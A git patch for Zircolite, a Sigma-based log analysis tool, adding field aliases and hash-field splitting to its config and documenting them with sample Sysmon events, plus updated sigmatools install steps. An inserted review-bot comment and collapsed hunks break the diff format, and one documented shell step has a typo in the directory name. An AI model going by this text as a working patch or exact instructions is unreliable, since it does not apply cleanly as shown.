From 0dfaa7a171f923bc5bff4b36502740b502d13e88 Mon Sep 17 00:00:00 2001
From: wagga40 <6437862+wagga40@users.noreply.github.com>
Date: Tue, 2 May 2023 22:16:28 +0200
Subject: [PATCH 1/3] Add field splitting, field aliases Update docs
---
 .gitignore | 3 +-
 config/fieldMappings.json | 9 +
 docs/Readme.md | 1 +
 docs/Usage.md | 161 +-
 docs/Zircolite_manual.pdf | Bin 661727 -> 669757 bytes
 rules/rules_linux.json | 2561 +-
 rules/rules_windows_generic.json | 23932 ++++++------
 rules/rules_windows_generic_full.json | 42086 +++++++++++----------
 rules/rules_windows_generic_high.json | 23932 ++++++------
 rules/rules_windows_generic_medium.json | 39176 ++++++++++---------
 rules/rules_windows_sysmon.json | 23932 ++++++------
 rules/rules_windows_sysmon_full.json | 42086 +++++++++++----------
 rules/rules_windows_sysmon_high.json | 23932 ++++++------
 rules/rules_windows_sysmon_medium.json | 39176 ++++++++++---------
 zircolite.py | 65 +-
 zircolite_dev.py | 56 +-
 16 files changed, 129722 insertions(+), 131386 deletions(-)
diff --git a/.gitignore b/.gitignore
index e19cc5b..61ed81c 100644
--- a/.gitignore
+++ b/.gitignore
@@ -33,4 +33,5 @@ tmp
 *.evtx
 *.evtx_data
 *.tar
-*.tar.sha256
\ No newline at end of file
+*.tar.sha256
+.pdm-python
diff --git a/config/fieldMappings.json b/config/fieldMappings.json
index f7ae020..d095b97 100644
--- a/config/fieldMappings.json
+++ b/config/fieldMappings.json
@@ -259,5 +259,14 @@
 "Event.EventData.updateTitle":"updateTitle",
 "Event.EventData.ParentIntegrityLevel":"ParentIntegrityLevel",
 "Event.EventData.ParentUser":"ParentUser"
+ },
+ "alias":
+ {
+ },
+ "split":
+ {
+ "Hash": {"separator":",", "equal":"="},
+ "Hashes": {"separator":",", "equal":"="},
+ "ConfigurationFileHash": {"separator":",", "equal":"="}
 }
 }
\ No newline at end of file
diff --git a/docs/Readme.md b/docs/Readme.md
index ea8fca9..cd9eecb 100644
--- a/docs/Readme.md
+++ b/docs/Readme.md
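Review bot: The three new `split` entries make whatever precedes `=` inside a `Hash`/`Hashes`/`ConfigurationFileHash` value become a top-level field name, so field names are now derived from event content rather than fixed by this file, and nothing in this hunk shows how a split key that collides with an existing or mapped field (a value carrying `Image=` or `EventID=`, for instance) is resolved; the implementation in zircolite.py should never let a split-derived key overwrite a field that already exists, and that precedence deserves a comment in the Usage docs. Sysmon formats these three values itself, so a collision from the built-in entries is unlikely, but the mechanism is user-configurable, so the guard matters for any field a user adds here. This config is also loaded from user-supplied `--config` files that predate this commit and lack the `alias` and `split` keys, so the loader should presumably default both to `{}` instead of failing on a missing key — confirm in the Python change, which is not in this hunk. The enclosing JSON object starts outside the hunk, and the file still ends without a trailing newline.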
@@ -4,6 +4,7 @@ * [Requirements and Installation](Usage.md#requirements-and-installation) * [Basic usage](Usage.md#basic-usage) +* [Field mappings, field exclusions, value exclusions, field aliases and field splitting](Usage.md#field-mappings-field-exclusions-value-exclusions-field-aliases-and-field-splitting) * [Generate your own rulesets](Usage.md#generate-your-own-rulesets) * [Why you should make your own rulesets](Usage.md#why-you-should-make-your-own-rulesets) * [Generate embedded versions](#generate-embedded-versions) diff --git a/docs/Usage.md b/docs/Usage.md index d2c24d3..fb79d71 100644 --- a/docs/Usage.md +++ b/docs/Usage.md @@ -4,6 +4,7 @@ * [Requirements and Installation](#requirements-and-installation) * [Basic usage](#basic-usage) +* [Field mappings, field exclusions, value exclusions, field aliases and field splitting](#field-mappings-field-exclusions-value-exclusions-field-aliases-and-field-splitting) * [Generate your own rulesets](#generate-your-own-rulesets) * [Why you should make your own rulesets](#why-you-should-make-your-own-rulesets) * [Generate embedded versions](#generate-embedded-versions) 
@@ -135,6 +136,150 @@ If you need to re-execute Zircolite, you can do it directly using the SQLite da --- +### Field mappings, field exclusions, value exclusions, field aliases and field splitting + +Sometimes your logs need some transformations to allow your rules to match against them. Zircolite has multiple mechanisms for this. The configuration of these mechanisms is provided by a file that can be found in the [config](../config/) directory of the repository. It is also possible to provide your own configuration woth the `--config` or `-c` options. + +The configuration file has the following structure : + +```json +{ + "exclusions" : [], + "useless" : [], + "mappings" : + { + "field_name_1": "new_field_name_1", + "field_name_2": "new_field_name_2" + }, + "alias": + { + "field_alias_1": "alias_1" + }, + "split": + { + "field_name_split": {"separator":",", "equal":"="} + } +} +``` + +#### Field mappings + +**field mappings** allow you to rename a field from your raw logs (the ones that you want to analyze with Zircolite). Zircolite already uses this mechanism to rename nested JSON fields. You can check all the builtin field mappings [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json). + +For example, if you want to rename the field "CommandLine" in **your raw logs** to "cmdline", you can add the following in the [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json) file : + +```json +{ + "exclusions" : [], + "useless" : [], + "mappings" : + { + "CommandLine": "cmdline" + }, + "alias":{}, + "split": {} +} +``` + +Please keep in mind that as opposed to field alias, the original field name is not kept. + +#### Field exclusions + +**field exclusions** allow you to exclude a field. Zircolite already uses this mechanism to exclude the `xlmns` field. You can check all the builtin field exclusions [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json). 
+ +#### Value exclusions + +**value exclusions** allow you to remove field which value is to be excluded. Zircolite already uses this mechanism to remove *null* and empty values. You can check all the builtin value exclusions [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json). + +#### Field aliases + +**field aliases** allow you to have multiple fields with different name but the same value. It is pretty similar to field mapping but you keep the original value. Field aliases can be used on original field names but also on mapped field names and splitted fields. + +Let's say you have this event log in JSON format (the event has been deliberately truncated): + +```json + { + "EventID": 1, + "Provider_Name": "Microsoft-Windows-Sysmon", + "Channel": "Microsoft-Windows-Sysmon/Operational", + "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "IntegrityLevel": "Medium", + } +``` + +Let's say you are not sure all your rules use the "CommandLine" field but you remember that some of them use the "cmdline" field. To avoid any problems you could use an alias for the "CommandLine" field like this : + +```json +{ + "exclusions" : [], + "useless" : [], + "mappings" : {}, + "alias":{ + "CommandLine": "cmdline" + }, + "split": {} +} +``` + +With this configuration, the event log used to apply Sigma rules will look like this : + +```json + { + "EventID": 1, + "Provider_Name": "Microsoft-Windows-Sysmon", + "Channel": "Microsoft-Windows-Sysmon/Operational", + "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "IntegrityLevel": "Medium", + } +``` + +Be careful when using aliases because the data is stored multiple times. 
+ +#### Field splitting + +**field aliases** allow you to split fields that contain key,value pairs. Zircolite already uses this mechanism to handle hash/hashes fields in Sysmon logs. You can check all the builtin field splittings [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json). Moreover, Field aliases can be applied to splitted fields. + +For example, let's say we have this Sysmon event log : + +```json + { + "Hashes": "SHA1=XX,MD5=X,SHA256=XXX,IMPHASH=XXXX", + "EventID": 1 + } +``` + +With the following configuration, Zircolite will split the `hashes` field like this : + +```json +{ + "exclusions" : [], + "useless" : [], + "mappings" : {}, + "alias":{}, + "split": { + "Hashes": {"separator":",", "equal":"="} + } +} +``` + +The final event log used to apply Sigma rules will look like this : + +```json + { + "SHA1": "F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054", + "MD5": "04029E121A0CFA5991749937DD22A1D9", + "SHA256": "9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F", + "IMPHASH": "7C955A0ABC747F57CCC4324480737EF7", + "Hashes": "SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7", + "EventID": 1 + } +``` + +--- + ### Generate your own rulesets Default rulesets are already provided in the `rules` directory. These rulesets only are the conversion of the rules located in [rules/windows](https://github.com/SigmaHQ/sigma/tree/master/rules/windows) directory of the Sigma repository. These rulesets are provided to use Zircolite out-of-the-box but [you should generate your own rulesets](#why-you-should-build-your-own-rulesets). 
@@ -143,18 +288,22 @@ Default rulesets are already provided in the `rules` directory. These rulesets o #### With sigmatools -Zircolite use the SIGMA rules in JSON format. To generate your ruleset you need the official sigmatools (**version 0.21 minimum**) : +Zircolite use the SIGMA rules in JSON format. Since the SQLite backend is not yet available in pySigma, you need to generate your ruleset with the official [legacy-sigmatools](https://github.com/SigmaHQ/legacy-sigmatools) (**version 0.21 minimum**) : + +```shell +pip3 install sigmatools +``` +since you need to access the configuration files directly it is easier to also clone the repository : ```shell -git clone https://github.com/SigmaHQ/sigma.git -cd sigma +git clone https://github.com/SigmaHQ/legacy-sigmatools.git +cd legacy-sigmools ``` -**You must have the sigma dependencies installed, check [here](https://github.com/SigmaHQ/sigma#installation) :** ##### Sysmon rulesets (when investigated endpoints have Sysmon logs) ```shell -tools/sigmac \ +sigmac \ -t sqlite \ -c tools/config/generic/sysmon.yml \ -c tools/config/generic/powershell.yml \ @@ -177,7 +326,7 @@ Where : ##### Generic rulesets (when investigated endpoints _don't_ have Sysmon logs) ```shell -tools/sigmac \ +sigmac \ -t sqlite \ -c tools/config/generic/windows-audit.yml \ -c tools/config/generic/powershell.yml \ 
diff --git a/docs/Zircolite_manual.pdf b/docs/Zircolite_manual.pdf index 2a3226934bc353af03c3a1ddfede99d83ef4a942..e4ae9aba955147384a6813345084d4585bdb3456 100644 GIT binary patch delta 66297 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 